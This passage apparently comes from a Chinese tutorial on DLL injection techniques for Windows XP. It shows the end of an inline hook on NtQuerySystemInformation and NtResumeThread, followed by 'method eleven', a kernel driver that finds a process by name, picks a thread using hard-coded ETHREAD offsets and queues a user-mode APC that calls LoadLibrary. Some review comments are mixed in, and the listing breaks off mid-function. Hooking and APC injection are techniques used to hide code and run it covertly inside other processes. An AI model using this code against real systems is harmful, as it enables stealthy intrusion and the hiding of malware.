EnterCriticalSection(&cs);
_asm {
lea edi,g_OldNtQuerySystemInformation mov esi,g_pfNtQuerySystemInformation cld
mov ecx,5 rep movsb
lea edi,g_OldNtResumeThread mov esi,g_pfNtResumeThread cld
mov ecx,5 rep movsb }
g_NewNtQuerySystemInformation[0] = 0xe9; g_NewNtResumeThread[0] = 0xe9; _asm {
lea eax, NewNtQuerySystemInformation mov ebx, g_pfNtQuerySystemInformation sub eax, ebx sub eax, 5
mov dword ptr [g_NewNtQuerySystemInformation + 1], eax lea eax, NewNtResumeThread mov ebx, g_pfNtResumeThread sub eax, ebx sub eax, 5
mov dword ptr [g_NewNtResumeThread + 1], eax } .......
LeaveCriticalSection(&cs);
g_bHook = TRUE; }
// Restores the code bytes patched by the hook-on routine above. The body is
// elided on this page ("......"); it presumably copies the saved g_Old* bytes
// back over the patched entry points -- confirm against the full listing.
void WINAPI HookOff() {
......
// Hook-on sets g_bHook TRUE once patching is done; clearing it here lets the
// rest of the code see the hook as disabled.
g_bHook = FALSE; }
第十一种方法:
利用ring0 APC注入dll
/*注:拿APC启动进程的代码改下...本代码用VC6.0+ XP DDK编译通过...在XP SP2运行成功.....
里面用到了一些硬编码..比如直接用ETHREAD的偏移值... __asm
{ //顺便提一下:下面是我机器上 LoadLibrary 的地址
mov eax,0x7C801d77 ----- 这个地址是作者 XP SP2 机器上 kernel32.dll 里 LoadLibrary 的地址,随系统版本和补丁而变,换机器必须自己改;更稳妥的做法是在驱动里解析目标进程中 kernel32.dll 的导出表(EAT)动态取得
注意:假使你不用硬编码,而是把 LoadLibrary 的地址保存在驱动变量 g_addr 里,也不能直接写 mov eax,g_addr。
因为这条 mov eax,g_addr
是在目标进程的用户态里执行的,而 g_addr 是一个内核变量,用户态代码访问不了内核空间。所以应该自己
计算 "mov eax,立即数" 这条指令在 APC 例程里的偏移,在驱动里把已经解析出来的地址作为立即数拷贝/改写进去就可以了 */
//基本思路就是在目标进程的上下文中让其调用loadlibrary加载我们的dll //copy much code
////////////////////////////////////////////////////////////////////////////////// 完整代码已重新编辑,也改了一下,防止被拿去干坏事
#include
/* Exclusive upper bound of the PID scan in InjectDll below. NOTE(review): an
 * arbitrary cap -- processes whose PID is >= MAX_PID are never examined. */
#define MAX_PID 65535
/////////////////////////////////////////////////////////////////////////////////////
////////////////////
/* Routines defined elsewhere in the original listing (not shown on this page). */

/* Presumably builds and queues the user-mode APC that makes the target process
 * load DllFullPath (see the description above). pTargetThread / pTargetProcess
 * are ETHREAD / EPROCESS pointers carried as ULONG, as InjectDll below computes
 * them. */
NTSTATUS
InstallUserModeApc(LPSTR DllFullPath, ULONG pTargetThread, ULONG pTargetProcess);

/* NOTE(review): looks like an end-of-code marker used to size ApcCreateProcess
 * when its bytes are copied into the target ("copy much code" above) -- confirm. */
void ApcCreateProcessEnd();

/* User-mode normal APC routine. By name, its arguments are the NormalContext
 * handed to KeInitializeApc and the SystemArgument1/2 handed to
 * KeInsertQueueApc (both declared below). */
void ApcCreateProcess(PVOID NormalContext, PVOID SystemArgument1, PVOID
SystemArgument2);
/*
 * Environment argument of KeInitializeApc (declared below). Presumably selects
 * the process context the APC is associated with -- confirm against the DDK.
 * Values are the kernel's: 0, 1, 2 in declaration order, made explicit here.
 */
typedef enum {
    OriginalApcEnvironment = 0,
    AttachedApcEnvironment = 1,
    CurrentApcEnvironment  = 2
} KAPC_ENVIRONMENT;
/*
 * Mirror of the kernel's KAPC_STATE: filled in by KeStackAttachProcess and
 * handed back to KeUnstackDetachProcess (both declared below). Field order and
 * types must stay exactly as the kernel lays them out -- do not reorder.
 * MaximumMode is presumably the kernel's MODE enumerator count -- confirm
 * against the DDK headers.
 */
typedef struct _KAPC_STATE {
    LIST_ENTRY ApcListHead[MaximumMode];   /* presumably indexed by processor mode */
    struct _KPROCESS *Process;
    BOOLEAN KernelApcInProgress;
    BOOLEAN KernelApcPending;
    BOOLEAN UserApcPending;
} KAPC_STATE, *PKAPC_STATE, *PRKAPC_STATE;
/*
 * Hand-written prototypes for the ntoskrnl exports used below. The page shows
 * no header that provides them, so the signatures must match the running
 * kernel exactly.
 */

/* Initializes Apc for Thread with the kernel/rundown/normal routines; by name,
 * ProcessorMode is the mode NormalRoutine runs in and NormalContext is passed
 * to it. */
VOID
KeInitializeApc ( PKAPC Apc,
                  PETHREAD Thread,
                  KAPC_ENVIRONMENT Environment,
                  PKKERNEL_ROUTINE KernelRoutine,
                  PKRUNDOWN_ROUTINE RundownRoutine,
                  PKNORMAL_ROUTINE NormalRoutine,
                  KPROCESSOR_MODE ProcessorMode,
                  PVOID NormalContext );

/* Queues an initialized APC; SystemArgument1/2 match the parameters of
 * ApcCreateProcess above by name. */
BOOLEAN
KeInsertQueueApc ( PKAPC Apc,
                   PVOID SystemArgument1,
                   PVOID SystemArgument2,
                   KPRIORITY Increment );

/* NOTE(review): the identifier is garbled by the hosting page (the "**"); the
 * parameter list is that of PsLookupProcessByProcessId -- confirm. That export
 * returns a referenced EPROCESS which the caller must release with
 * ObDereferenceObject; the scan loop in InjectDll below does not do so in the
 * part shown on this page. */
NTSTATUS
PsLookupProces**yProcessId( __in HANDLE ProcessId,
                            __deref_out PEPROCESS *Process );

/* Returns the process image file name; InjectDll compares it with _stricmp
 * against the requested ProcessName. */
UCHAR *
PsGetProcessImageFileName( __in PEPROCESS Process
);

/* Attach/detach pair: state saved by KeStackAttachProcess in ApcState must be
 * handed back to KeUnstackDetachProcess unchanged. */
VOID
KeStackAttachProcess ( IN PVOID Process,
                       OUT PRKAPC_STATE ApcState );
VOID
KeUnstackDetachProcess(
                       IN PRKAPC_STATE ApcState );
/////////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////
//===================================================================================
====//
// InjectDll:遍历进程,按映像名找到要注入的进程;找到后遍历它的线程,优先取第一个 alertable 的线程(代码以 ETHREAD+0x164 处的标志判断,变量名 pNotAlertableThread 表明其含义), //
// 找不到则退而用最后一个非 alertable 的线程。 //
// 注意:这里的 EPROCESS/ETHREAD 偏移(0x50、0x1b0、0x164)是我在 XP 上取的硬编码值,在其他操作系统版本上偏移可能不同,必须重新核对。另外两点审查意见: //
// (1) PsLookupProces**yProcessId(页面上名字被打码,应为 PsLookupProcessByProcessId)成功时返回的 EPROCESS 带有一个引用,下面可见的循环对不匹配的进程没有调用 ObDereferenceObject,会泄漏引用; //
// (2) pTargetProcess、pTargetThread、pNotAlertableThread 在声明时都没有初始化为 0,只在匹配分支里才赋值;找不到目标进程时 if(!pTargetProcess) 读到的是栈上的垃圾值,可能带着无效的 pTargetThread 继续往下执行。 //
//===================================================================================
===//
void InjectDll(LPSTR DllFullPath,LPSTR ProcessName) {
//全部定义为ULONG类型 ULONG pTargetProcess; ULONG pTargetThread; ULONG pNotAlertableThread; ULONG pSystemProcess; ULONG pTempThread;
ULONG pNextEntry, pListHead, pThNextEntry,pThListHead; ULONG pid;
PEPROCESS EProcess; NTSTATUS status;
for(pid=0; pid status = PsLookupProces**yProcessId((HANDLE)pid,&EProcess); if((NT_SUCCESS(status))) { if(_stricmp(PsGetProcessImageFileName(EProcess),ProcessName)==0) { pSystemProcess=(ULONG)EProcess; pTargetProcess =pSystemProcess; pTargetThread = pNotAlertableThread = 0; pThListHead = pSystemProcess+0x50; pThNextEntry=*(ULONG *)pThListHead; while(pThNextEntry != pThListHead) { pTempThread =pThNextEntry-0x1b0; //ETHREAD if(*(char *)(pTempThread+0x164)) //受信?? { pTargetThread =pTempThread; break; } else { pNotAlertableThread =pTempThread; } pThNextEntry = *(ULONG *)pThNextEntry; } break; } } } if(!pTargetProcess) return; if(!pTargetThread) pTargetThread = pNotAlertableThread; if(pTargetThread) {